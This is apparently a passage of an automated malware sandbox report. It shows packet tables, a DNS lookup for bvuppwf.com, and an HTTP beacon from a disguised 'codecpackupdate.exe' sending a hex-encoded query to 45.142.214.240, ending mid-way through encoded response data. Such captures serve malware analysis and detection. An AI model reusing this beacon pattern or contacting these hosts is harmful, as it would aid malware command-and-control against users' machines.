                                                                        Mar 29, 2024 12:59:42.389672995 CET4979480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:42.497809887 CET4979480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:42.715254068 CET804979445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:42.794445992 CET804979445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:42.794512033 CET4979480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:42.903228998 CET4979480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:43.120991945 CET804979445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:43.203939915 CET804979445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:43.204139948 CET4979480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:43.328238964 CET4979480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:43.328546047 CET4979580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:43.545773983 CET804979445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:43.545852900 CET4979480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:43.547689915 CET804979545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:43.547761917 CET4979580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:43.547929049 CET4979580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:43.767944098 CET804979545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:43.846704006 CET804979545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:43.846767902 CET4979580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:43.965862036 CET4979580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:43.966181040 CET4979680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:44.183698893 CET804979645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:44.183897972 CET4979680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:44.183959007 CET4979680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:44.186639071 CET804979545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:44.186692953 CET4979580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:44.400142908 CET804979645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:44.487411022 CET804979645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:44.487473011 CET4979680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:44.606403112 CET4979680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:44.606725931 CET4979780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:44.822721958 CET804979645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:44.822889090 CET4979680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:44.825920105 CET804979745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:44.825992107 CET4979780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:44.826159954 CET4979780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.046700001 CET804979745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:45.124955893 CET804979745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:45.125025988 CET4979780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.247061014 CET4979780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.247359991 CET4979880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.463677883 CET804979845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:45.463754892 CET4979880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.464018106 CET4979880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.466136932 CET804979745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:45.466201067 CET4979780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.680372953 CET804979845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:45.771872997 CET804979845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:45.771931887 CET4979880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.887736082 CET4979880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.888058901 CET4979980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.105206013 CET804979845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:46.105282068 CET4979880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.107984066 CET804979945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:46.108061075 CET4979980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.108211040 CET4979980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.330605030 CET804979945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:46.415388107 CET804979945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:46.415463924 CET4979980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.528198957 CET4979980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.528520107 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.748430014 CET804979945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:46.748451948 CET804980045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:46.748589993 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.748593092 CET4979980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.748719931 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.968141079 CET804980045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:47.047234058 CET804980045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:47.047293901 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:47.153192043 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:47.372972965 CET804980045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:47.457124949 CET804980045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:47.457170010 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:47.576144934 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:47.576431990 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:47.792754889 CET804980145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:47.792870045 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:47.793024063 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:47.795660973 CET804980045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:47.795717001 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.011859894 CET804980145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:48.091517925 CET804980145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:48.091578007 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.200098038 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.417154074 CET804980145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:48.501480103 CET804980145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:48.501543999 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.621951103 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.622248888 CET4980280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.838170052 CET804980145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:48.838246107 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.841402054 CET804980245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:48.841489077 CET4980280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.841670036 CET4980280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.060973883 CET804980245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:49.144664049 CET804980245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:49.144726992 CET4980280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.262414932 CET4980280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.262686014 CET4980380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.480196953 CET804980345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:49.480315924 CET4980380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.480505943 CET4980380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.481689930 CET804980245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:49.481743097 CET4980280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.698110104 CET804980345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:49.777338028 CET804980345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:49.777417898 CET4980380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.889538050 CET4980380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.890211105 CET4980480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.106987000 CET804980345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:50.107059002 CET4980380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.108954906 CET804980445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:50.109025955 CET4980480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.109189034 CET4980480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.327917099 CET804980445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:50.411803961 CET804980445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:50.411864996 CET4980480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.528037071 CET4980480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.528322935 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.745785952 CET804980545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:50.745870113 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.746015072 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.746835947 CET804980445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:50.746895075 CET4980480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.963309050 CET804980545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:51.042684078 CET804980545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:51.042742014 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:51.153063059 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:51.371093035 CET804980545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:51.456732988 CET804980545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:51.456808090 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:51.575130939 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:51.575413942 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:51.792578936 CET804980545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:51.792664051 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:51.794009924 CET804980645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:51.794078112 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:51.794274092 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.013370037 CET804980645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:52.092668056 CET804980645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:52.092844009 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.205310106 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.424259901 CET804980645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:52.510409117 CET804980645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:52.510499001 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.622145891 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.622478008 CET4980780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.841006994 CET804980645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:52.841104031 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.843002081 CET804980745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:52.843080997 CET4980780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.843293905 CET4980780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.063891888 CET804980745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:53.149842978 CET804980745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:53.149954081 CET4980780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.262649059 CET4980780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.262938976 CET4980880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.482333899 CET804980845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:53.482418060 CET4980880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.482568979 CET4980880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.483175039 CET804980745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:53.483247042 CET4980780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.704027891 CET804980845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:53.783272982 CET804980845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:53.783354044 CET4980880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.903332949 CET4980880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.903671026 CET4980980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.123467922 CET804980945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:54.123524904 CET804980845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:54.123651981 CET4980880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.123673916 CET4980980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.123874903 CET4980980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.343255997 CET804980945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:54.431598902 CET804980945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:54.431680918 CET4980980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.544033051 CET4980980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.544481039 CET4981080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.762186050 CET804981045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:54.762270927 CET4981080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.762451887 CET4981080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.763847113 CET804980945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:54.763920069 CET4980980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.980247021 CET804981045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:55.064431906 CET804981045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:55.064593077 CET4981080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.184916973 CET4981080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.185239077 CET4981180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.403759956 CET804981045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:55.403790951 CET804981145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:55.403845072 CET4981080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.403928995 CET4981180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.404428959 CET4981180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.622071028 CET804981145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:55.707166910 CET804981145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:55.707335949 CET4981180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.825649023 CET4981180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.826124907 CET4981280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.043406010 CET804981145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:56.043534994 CET4981180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.048418045 CET804981245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:56.048558950 CET4981280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.055876970 CET4981280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.281380892 CET804981245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:56.367341995 CET804981245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:56.367490053 CET4981280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.728317022 CET4981280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.728719950 CET4981380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.944904089 CET804981345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:56.945055008 CET4981380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.945214987 CET4981380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.950623989 CET804981245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:56.950697899 CET4981280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:57.161375046 CET804981345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:57.244874001 CET804981345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:57.245011091 CET4981380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:58.814126015 CET4981380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:58.814440966 CET4981480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:59.030622959 CET804981345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:59.030814886 CET4981380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:59.030847073 CET804981445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:59.031008005 CET4981480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:59.031291962 CET4981480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:59.248455048 CET804981445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:59.332313061 CET804981445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:59.332379103 CET4981480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:59.457117081 CET4981480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:59.457681894 CET4981580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:59.673579931 CET804981445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:59.673691034 CET4981480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:59.675194979 CET804981545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:59.675281048 CET4981580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:59.675457001 CET4981580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:59.893695116 CET804981545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:59.972255945 CET804981545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:59.977077961 CET4981580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:00.096493006 CET4981580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:00.096760988 CET4981680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:00.317219019 CET804981545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:00.317281961 CET4981580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:00.317465067 CET804981645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:00.317545891 CET4981680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:00.317750931 CET4981680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:00.538278103 CET804981645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:00.622545958 CET804981645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:00.622678995 CET4981680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:00.925067902 CET4981680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:00.925471067 CET4981780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:01.144150019 CET804981745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:01.144239902 CET4981780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:01.144442081 CET4981780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:01.145929098 CET804981645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:01.145976067 CET4981680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:01.363008976 CET804981745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:01.452119112 CET804981745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:01.456427097 CET4981780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:01.576957941 CET4981780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:01.577289104 CET4981880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:01.795030117 CET804981845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:01.795205116 CET4981880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:01.795670033 CET804981745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:01.795743942 CET4981780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:01.795964956 CET4981880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:02.014519930 CET804981845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:02.097373009 CET804981845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:02.097448111 CET4981880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:02.218393087 CET4981880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:02.218686104 CET4981980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:02.436045885 CET804981845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:02.436131954 CET4981880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:02.441905022 CET804981945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:02.442037106 CET4981980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:02.442250967 CET4981980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:02.664628029 CET804981945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:02.749161005 CET804981945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:02.749219894 CET4981980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:02.863456964 CET4981980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:02.863837004 CET4982080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:03.080363035 CET804982045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:03.080440998 CET4982080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:03.080619097 CET4982080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:03.086133003 CET804981945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:03.086184978 CET4981980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 13:00:03.297362089 CET804982045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:03.385246992 CET804982045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 13:00:03.385303020 CET4982080192.168.2.445.142.214.240

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Mar 29, 2024 12:58:53.502712965 CET6363253192.168.2.491.211.247.248
                                                                        Mar 29, 2024 12:58:53.711462975 CET536363291.211.247.248192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Mar 29, 2024 12:58:53.502712965 CET192.168.2.491.211.247.2480x14d3Standard query (0)bvuppwf.comA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Mar 29, 2024 12:58:53.711462975 CET91.211.247.248192.168.2.40x14d3No error (0)bvuppwf.com45.142.214.240A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • bvuppwf.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.44973645.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:58:54.025398016 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ec909e3b HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:58:54.341233015 CET1232INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:58:54 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 34 30 30 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 30 63 34 35 30 66 65 39 30 63 64 65 66 31 37 30 31 65 61 61 61 34 32 62 62 34 36 39 30 61 31 65 34 61 65 64 33 64 65 30 39 64 38 34 31 64 33 66 33 38 66 37 31 37 33 66 66 32 33 61 37 39 34 63 39 31 65 32 38 66 37 37 33 35 65 62 33 37 36 66 35 37 39 61 38 33 36 35 66 63 33 66 65 64 33 30 33 63 34 34 36 64 33 37 63 62 35 31 35 65 31 33 31 38 65 32 66 66 61 31 31 61 37 36 32 63 66 35 30 62 62 65 33 34 65 65 36 35 62 37 37 34 36 66 32 32 35 36 35 39 32 32 35 36 35 38 38 65 31 31 34 63 36 65 35 39 36 39 61 33 62 63 36 36 65 39 35 31 33 63 36 35 31 38 37 32 62 61 38 35 38 62 37 65 39 34 31 32 33 65 39 37 64 64 38 66 63 37 39 62 39 38 66 65 34 64 34 34 33 65 32 32 30 63 38 31 37 33 35 34 33 35 66 32 32 66 64 32 32 37 61 30 32 36 37 62 39 65 63 38 36 66 66 38 66 32 38 34 66 65 34 34 32 37 64 32 36 65 30 32 38 35 65 66 31 66 36 65 34 38 63 66 61 33 35 37 61 61 30 65 63 35 39 39 33 38 37 66 64 36 34 32 66 31 61 61 33 36 39 65 63 39 65 63 31 62 31 36 35 64 31 36 30 30 34 32 30 33 34 37 61 61 65 35 32 63 64 63 33 61 65 33 62 33 30 62 62 63 64 30 38 62 32 30 31 62 39 61 32 33 39 62 31 63 30 64 35 33 32 37 35 32 63 31 30 64 32 33 30 66 35 31 32 65 39 64 31 62 34 30 32 34 66 64 32 33 34 31 32 63 63 35 30 63 35 66 35 36 33 38 33 32 63 62 34 39 35 34 30 61 33 65 62 64 30 61 32 63 31 33 65 32 33 62 65 37 33 62 63 65 35 30 66 38 35 61 31 62 63 37 35 34 34 61 39 38 35 65 61 32 33 61 66 66 62 38 66 38 37 31 66 65 64 31 34 65 39 35 32 38 38 35 32 36 34 63 66 61 62 63 30 66 39 64 66 35 34 36 36 61 37 39 63 65 34 33 38 61 66 37 34 38 39 30 66 33 63 61 33 32 30 63 61 33 39 64 63 39 38 31 65 63 39 35 38 62 30 32 66 30 35 31 34 35 62 63 62 64 37 36 65 35 63 33 30 35 33 36 32 38 33 65 32 38 66 32 61 33 32 36 31 34 65 31 31 64 31 63 33 62 33 31 39 31 39 66 63 64 36 62 38 65 39 64 36 33 63 37 37 36 35 65 66 33 66 39 62 63 33 30 31 30 65 35 65 39 34 61 65 63 65 30 30 34 63 34 34 64 34 37 36 37 34 35 64 33 35 35 30 65 32 64 31 63 63 63 64 66 31 63 62 34 64 39 64 33 65 36 35 34 34 66 62 37 63 33 34 38 39 32 39 62 65 63 61 38 64 37 39 38 39 34 61 63 31 38 34 32 39 30 32 30 61 36 37 39 35 66 64 